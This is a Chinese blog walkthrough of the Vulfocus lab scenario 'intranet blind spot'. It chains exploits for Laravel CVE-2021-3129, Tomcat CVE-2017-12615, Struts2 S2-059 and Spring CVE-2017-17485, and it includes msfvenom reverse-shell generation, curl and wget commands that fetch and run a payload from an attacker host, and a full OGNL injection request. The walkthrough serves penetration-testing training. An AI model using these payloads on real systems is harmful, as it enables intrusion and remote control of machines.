vulfocus靶场情景模式-内网死角

最新推荐文章于 2024-05-29 09:46:22 发布
最新推荐文章于 2024-05-29 09:46:22 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: 内网渗透学习笔记 文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44110340/article/details/126132688
版权

vulfocus 内网死角

靶场很多flag没有了,不要太过在意

内网死角 内网资产分布

请添加图片描述

直接打开一个 Laravel框架 (Laravel v8.41.0 (PHP v7.4.19)),查询历史漏洞 存在 CVE-2021-3129 远程代码执行

1. laravel-CVE-2021-3129-EXP

github项目地址:https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

一键 getshell (注意url后面不要 /)

python3 laravel-CVE-2021-3129-EXP.py http://127.0.0.1:8000

请添加图片描述

哥斯拉连接 需要使用3.0一下版本

请添加图片描述

2. MSF上线 内网渗透

msf生成linux后门

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxxx -f elf -o xxxx.elf

配置msf linux/x86/meterpreter/reverse_tcp payload监听

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST xxx
set LPORT xxx
exploit

在受控机器中执行 下载木马程序命令 并执行上线

curl -LO http://vps/xx.elf
chomd +x xx.elf
./xx.elf

查看网络发现多个网卡和IP

192.120.2.83

192.120.4.60

172.18.0.29

10.0.0.166

添加路由

meterpreter > run autoroute  -s 192.120.2.0/24
meterpreter > run autoroute  -s 192.120.4.0/24

内网资产探测

use auxiliary/scanner/portscan/tcp
set rhosts 192.120.4.0/24
set rports 22,23,80,8080,3389,445,6379
set threads 20
run

请添加图片描述

发现资产:

192.120.4.43:80

192.120.4.46:8080

192.120.4.48:8080

192.120.4.60:80

192.120.2.27:80

192.120.2.30:22

192.120.2.37:6379

192.120.2.63:6379

192.120.2.72:22

192.120.2.83:80

设置代理

use auxiliary/server/socks_proxy
run

Proxifier设置 vpsip 和 socks端口

请添加图片描述

漏洞检测

使用vulmap对IP进行漏洞扫描 发现192.120.4.46 存在 tomcat CVE-2017-12615 文件上传漏洞

请添加图片描述

CVE-2017-12615 漏洞利用

请添加图片描述

ls /tmp 没有flag cat /proc/self/environ flag提交无效

msf上线 4.46

信息收集 发现 还有内网 192.120.1.0

添加路由

端口扫描

扫描结果:

[+] 192.120.1.46: - 192.120.1.46:8080 - TCP OPEN
[+] 192.120.1.49: - 192.120.1.49:8080 - TCP OPEN
[+] 192.120.1.50: - 192.120.1.50:8080 - TCP OPEN
[+] 192.120.1.52: - 192.120.1.52:80 - TCP OPEN
[+] 192.120.1.54: - 192.120.1.54:6379 - TCP OPEN
[*] 192.120.1.0/24: - Scanned 53 of 256 hosts (20% complete)
[+] 192.120.1.69: - 192.120.1.69:6379 - TCP OPEN
[+] 192.120.1.70: - 192.120.1.70:80 - TCP OPEN
[+] 192.120.1.71: - 192.120.1.71:8080 - TCP OPEN

发现192.120.1.50 存在 strtus2 059漏洞

请添加图片描述

struts2 059漏洞利用

设置burp socks 代理

请添加图片描述

burp抓包执行msf上线木马

POST /index.action HTTP/1.1
Host: 192.120.1.50:8080
Content-Length: 583
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.120.1.50:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.120.1.50:8080/index.action
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: JSESSIONID=7D1448A2C7A527A56A5F8A870A7C3FF1
Connection: close

skillName=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess.allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess.acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess.acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util.Scanner(%23a.exec('./xx.elf').getInputStream()).useDelimiter('%5C%5C%5C%5CA')%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A''%2C%23res.print(%23str)%2C%23res.close()%0A%7d

发现 192.120.3.0/24 内网 再次添加路由

发现 .3.0资产如下:

[+] 192.120.3.51: - 192.120.3.51:8080 - TCP OPEN
[+] 192.120.3.55: - 192.120.3.55:8080 - TCP OPEN
[+] 192.120.3.54: - 192.120.3.54:8080 - TCP OPEN
[+] 192.120.3.57: - 192.120.3.57:8080 - TCP OPEN

发现192.120.3.51:8080 srpingboot

请添加图片描述

经过尝试发现漏洞为 CVE-2017-17485

https://blog.csdn.net/serendipity1130/article/details/120030386

spel.xml

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="     http://www.springframework.org/schema/beans     http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg>
            <array>
                <value>wget</value>
                <value>http://xxxx:8080/xx.elf</value>
            </array>
        </constructor-arg>
        <property name="any" value="#{ pb.start() }"/>
    </bean>
</beans>

POC

POST /exploit HTTP/1.1
Host: 192.120.3.51:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 131

{
"param": [
  "org.springframework.context.support.FileSystemXmlApplicationContext",
  "http://xxxx:8080/spel.xml"
]
}

msf上线

请添加图片描述

没有 flag

半只特立独行的猪
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安全攻防实验-2】VulFocus搭建
qq_26579613的博客
02-07 1052
建议内网搭建
vulfocus::rocket:Vulfocus是一个扩展集成平台,将打破环境docker合并,放入即可使用,开箱即用
02-02
欢迎来到Vulfocus :rocket: Vulfocus是一个突破集成平台,将突破环境docker扩展,投入即用,开箱即用。 Vulfocus官网: ://fofapro.github.io/vulfocus/ 在线演示: : 背景 进攻靶场是目前每个安全人员以及想学习信息安全的人必备的东西,但目前商业化产品居多,还有一些类似的dvwa,sqli-labs这类的开源项目,但破坏环境比较固定,使用完一次后就失去其作用。建造的成本过高,每次启动的流程会比较繁琐,甚至很多场景是不满足的,之前关于突破性的环境耦合使用多的是vulhub,但是作为企业,高校等以及相关的培训,单纯的突破环境不一定能满足使用的需求,所以我们基于当下的一些靶场项目做出了一些小的改进来符合我们的一些需求,从而增加了标志的形式,来满足一些考核与验证的需求,可以对我们内部人员能力进行考核,于是Vulfocus就诞生了。 认识Vulfocus 因为Vulfocus一个突破性的集成平台,所以可以无限向里添加裂缝环境没有限制,而是是你的内存足够大。破坏下一无法启动的现象。 Vulfocus的docker仓库 Vu
vulfocus靶场搭建(实测)
热门推荐
m0_50406447的博客
07-28 3万+
vulfocus的特性 1.启动:一键漏洞环境启动,方便简单。 2.自带 Flag 功能:每次启动 flag 都会自动更新,明确漏洞是否利用成功。 3.带有计分功能也可适用于相关安全人员能力的考核。 4.兼容 Vulhub、Vulapps 中所有漏洞镜像。 一、使用centos7作为靶机环境 1.挂载镜像 mkdir /mnt/cdrom:创建挂载点 mount /dev/cdrom /mnt/cdrom:镜像挂载 注意:这个必须已连接,否则镜像挂载失败 2.配置yum源 (1)进入y
Centos 7下的VulFocus靶场搭建详细教程(含遇到问题解答)
天泽岁月
05-29 1081
centos7 部署vulfocus靶场超级详细教程
靶场vulfocus搭建和场景编排
信安是不可或缺的一部分!
05-30 2490
构建的场景中的主要选一下比较新的漏洞,不然会出现横向移动很麻烦,还有一些漏洞需要回显,可能就会出现一些问题导致无法无法成功,建议场景搭建好后测试一下可行性,因为是docker可能会有一些命令无法使用,这也会造成一些困难。
vulfocus靶场入门
七堇年的博客
02-22 5660
vulfocus靶场入门
Docker简单搭建Vulfocus靶场 CN-SEC 中文网.pdf
02-07
"Docker简单搭建Vulfocus靶场" Docker是一个流行的容器化平台,能够轻松地搭建和管理各种应用程序。Vulfocus是一个基于Docker的靶场平台,提供了大量的漏洞靶场环境,方便安全研究人员和渗透测试人员进行漏洞研究和...
vuInhub靶场实战系列-prime:2
最新发布
06-08
vuInhub靶场实战系列-prime:2
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
纵横网络靶场资源题-过程详解
09-21
网络靶场实战技巧与Wireshark流量分析】 在网络安全领域,网络靶场是一种重要的实践平台,它模拟真实的网络环境,让参与者通过解决各种安全挑战来提升技能。本篇文章主要探讨的是一个涉及到Wireshark流量分析的...
Vulfocus 官方介绍 以及 环境安装
yangyangrenren的专栏
12-16 4924
转载于:Vulfocus 官方介绍 Docker环境+Vulfocus环境的安装(无脑安装,有手就会) Vulfocus 官方介绍 Vulfocus 是一个漏洞集成平台,将漏洞环境 docker 镜像,放入即可使用,开箱即用。 Vulfocus 官网:https://fofapro.github.io/vulfocus/ 在线 Vulfocus: http://vulfocus.fofa.so/ http://vulfocus.io/ http://vulfocus.club/ 背景 漏洞靶场是目前每个
Vulfocus漏洞复现】tomcat-cve_2017_12615
weixin_45632448的博客
04-07 471
访问目标 http://123.58.236.76:15450/ burp抓包 修改请求方式为PUT,增加POST请求体 PUT /shell.jsp/ HTTP/1.1 Host: 123.58.236.76:15450 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Exchange的渗透流程(一)
Sunnet的博客
05-07 1820
Exchange的渗透流程(一)
国产开源网络安全渗透测试集成靶场vulfocus
顺其自然~专栏
10-17 1345
进入项目所在的目录的vulfocus-api文件夹目录下,执行下面命令。
虚拟机kali中docker拉取vulfocus靶场status:exited(1),主机地址访问不成功问题 求大神指导
Ling_es的博客
12-05 1067
主机:m1pro 虚拟机:pd装了kali linux 在kali里始终无法用主机地址访问 首先 docker没问题 拉取vulfocus镜像 没问题 创建容器没问题 但是不懂为什么status不是up,都是exited(1) 然后主机地址找不到vulfocus 检查日志 3天了,人麻了,不造哪儿的问题,求大神指导🙏
令人烦躁的多层网络
qq_53086690的博客
12-06 316
这里是noobteam公众号。我们主要是分享一些自己学到的东西和遇到的困难。 今天带给大家的是vulfocus靶场里的令人烦躁的多层网络。 打开网页 是apache的页面。查看返回包来确定是哪个版本 从返回包的Server中的版本信息可以看到是apache2.4.49版本。 在apache2.4.49版本存在cve-2021-41773\cve-2021-42013漏洞。 利用工具进行检测 确实存在漏洞。然后对漏洞进行利用这里可以直接用此工具进行RCE 可以读取到/tmp下的flag。 第二种办法就
内网安全】横向移动&Exchange服务&有账户CVE漏洞&无账户口令爆破
今天是几号的博客
03-30 852
Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。简单而言,Exchange server可以被用来构架应用于企业、学校的邮件系统。Exchange是收费邮箱,但是国内微软并不直接出售Exchange邮箱,而是将Exchange、Lync、Sharepoint三款产品包装成Office365出售。实验靶场环境:0day.org单域环境Win7 x64 0day.org PC-Jack 访问域主机地址。
Vulfocus安装过程
tlovejr的博客
03-01 4298
一、Vulfocus背景 漏洞靶场是目前每个安全人员以及想学习信息安全的人必备的东西,但目前商业化产品居多,还有一些类似 dvwa、 sqli-labs 这类的开源项目,但是漏洞环境比较固定,使用完一次后就失去其作用。搭建的成本过高,每次启动的流程会比较繁琐,甚至很多场景是不满足的,之前关于漏洞环境镜像使用多的是 vulhub,但是对于我们个人来说,要去构建一个新的漏洞环境确实麻烦,还有配置什么的,单纯的漏洞环境不一定能满足使用的需求,所以Vulfocus就基于当下的一些靶场项目做出了小小的改进来符合需求
vulfocus靶场
07-28
vulfocus靶场是一个漏洞集成平台,可以通过在服务器中安装docker来使用。你可以使用以下命令将vulfocus镜像拉取到本地:docker pull vulfocus/vulfocus:latest。搭建vulfocus靶场可以按需搭建在本地或自己的服务器上,它提供了场景编排功能,可以用于内网突破训练和多重内网的穿透等用途。如果你想在本地搭建vulfocus靶场,可以按照以下步骤进行操作: 1. 创建一个目录并进入该目录,例如:mkdir VF靶场 && cd VF靶场。 2. 使用git命令克隆vulfocus仓库:git clone https://github.com/fofapro/vulfocus.git web。 3. 配置环境参数,将你的CentOS服务器的IP地址填入配置文件中。你可以使用ifconfig命令查看你的IP地址。 这样,你就可以搭建vulfocus靶场并开始使用了。 #### 引用[.reference_title] - *1* *2* [【靶场vulfocus搭建和场景编排](https://blog.csdn.net/qq_39583774/article/details/130917089)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [vulfocus靶场的搭建](https://blog.csdn.net/qq_68890680/article/details/131351918)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值